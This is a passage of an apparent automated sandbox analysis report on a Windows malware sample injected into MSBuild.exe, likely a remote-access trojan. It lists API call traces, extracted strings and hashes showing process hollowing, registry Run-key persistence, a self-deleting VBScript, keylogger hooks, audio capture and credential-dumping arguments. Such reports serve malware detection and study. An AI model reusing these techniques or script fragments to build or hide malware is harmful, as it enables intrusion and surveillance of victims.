                                                • DeleteObject.GDI32(00000000), ref: 00418285
                                                • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                • DeleteObject.GDI32(00000000), ref: 00418344
                                                • GlobalFree.KERNEL32(?), ref: 0041834B
                                                • DeleteDC.GDI32(?), ref: 0041835B
                                                • DeleteDC.GDI32(00000000), ref: 00418366
                                                • DeleteDC.GDI32(?), ref: 00418398
                                                • DeleteDC.GDI32(00000000), ref: 0041839B
                                                • DeleteObject.GDI32(?), ref: 004183A1
                                                Similarity
                                                • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                • String ID: DISPLAY
                                                • API String ID: 1765752176-865373369
                                                APIs
                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                • ResumeThread.KERNEL32(?), ref: 00417582
                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                • GetLastError.KERNEL32 ref: 004175C7
                                                Similarity
                                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                                • API String ID: 4188446516-108836778
                                                APIs
                                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                • ExitProcess.KERNEL32 ref: 0041151D
                                                  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                  • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                  • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
                                                  • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
                                                  • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C
                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                • API String ID: 4250697656-2665858469
                                                • Opcode ID: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
                                                • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                • Opcode Fuzzy Hash: eb8ff656f144838187034c17abf61e056b931f5bb5ec87d5f57ca59327fe8020
                                                • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                APIs
                                                  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                  • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                • ExitProcess.KERNEL32 ref: 0040C63E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                • API String ID: 1861856835-3168347843
                                                • Opcode ID: 1fca09a02b8493e53294f51d4634f72964b40bbef437048ec22e150e28ca3ccf
                                                • Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
                                                • Opcode Fuzzy Hash: 1fca09a02b8493e53294f51d4634f72964b40bbef437048ec22e150e28ca3ccf
                                                • Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                                                APIs
                                                  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                  • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                • ExitProcess.KERNEL32 ref: 0040C287
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                • API String ID: 3797177996-1998216422
                                                • Opcode ID: c4cc4d00899e4284936be169aaff6719d95b62d3fffb22ecd15678fbb4326d45
                                                • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                • Opcode Fuzzy Hash: c4cc4d00899e4284936be169aaff6719d95b62d3fffb22ecd15678fbb4326d45
                                                • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                APIs
                                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                • SetEvent.KERNEL32 ref: 0041A38A
                                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                • CloseHandle.KERNEL32 ref: 0041A3AB
                                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                • API String ID: 738084811-1408154895
                                                • Opcode ID: c362ced5fa98a12e984468584ff4096b6ed47b7628e845a56c9a339ad7c4d382
                                                • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                • Opcode Fuzzy Hash: c362ced5fa98a12e984468584ff4096b6ed47b7628e845a56c9a339ad7c4d382
                                                • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Write$Create
                                                • String ID: RIFF$WAVE$data$fmt
                                                • API String ID: 1602526932-4212202414
                                                • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                APIs
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                • API String ID: 1646373207-89630625
                                                • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                APIs
                                                • _wcslen.LIBCMT ref: 0040BC75
                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                • _wcslen.LIBCMT ref: 0040BD54
                                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000000,00000000), ref: 0040BDF2
                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                • _wcslen.LIBCMT ref: 0040BE34
                                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                • ExitProcess.KERNEL32 ref: 0040BED0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$del$open$BG$BG
                                                • API String ID: 1579085052-1088133900
                                                • Opcode ID: 8a4e8abcb5692669c638f214cb972068405fdb8eb26e88a62148626bb00c57e2
                                                • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                • Opcode Fuzzy Hash: 8a4e8abcb5692669c638f214cb972068405fdb8eb26e88a62148626bb00c57e2
                                                • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                APIs
                                                • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                • lstrlenW.KERNEL32(?), ref: 0041B207
                                                • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                • _wcslen.LIBCMT ref: 0041B2DB
                                                • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                • GetLastError.KERNEL32 ref: 0041B313
                                                • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                • GetLastError.KERNEL32 ref: 0041B370
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                • String ID: ?
                                                • API String ID: 3941738427-1684325040
                                                • Opcode ID: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                • Opcode Fuzzy Hash: d489e3e95fd4da7a256b353d04e65c95c699bf3c253225e66008eb700c534145
                                                • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$EnvironmentVariable$_wcschr
                                                • String ID:
                                                • API String ID: 3899193279-0
                                                • Opcode ID: f97f98dd34153332c2010fb65b1131a463ec8f76e6cba2d9c1c767644d430276
                                                • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                • Opcode Fuzzy Hash: f97f98dd34153332c2010fb65b1131a463ec8f76e6cba2d9c1c767644d430276
                                                • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                • Sleep.KERNEL32(00000064), ref: 00412060
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                • String ID: /stext "$HDG$HDG$>G$>G
                                                • API String ID: 1223786279-3931108886
                                                • Opcode ID: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                • Opcode Fuzzy Hash: 36ecec2bd287229840889fa2f21ce4d309759ff1e99f2e4f361d0ee51ee9b760
                                                • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                APIs
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                • API String ID: 2490988753-744132762
                                                • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                                                • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                Strings
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                • API String ID: 1332880857-3714951968
                                                • Opcode ID: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                                                • Opcode Fuzzy Hash: c129c5d3b2225b1f8cda05c9a3a6c18510288d4317852ec5d704d9b0c7986d58
                                                • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                                                APIs
                                                • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                • GetCursorPos.USER32(?), ref: 0041CAF8
                                                • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                • ExitProcess.KERNEL32 ref: 0041CB74
                                                • CreatePopupMenu.USER32 ref: 0041CB7A
                                                • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                Strings
                                                Similarity
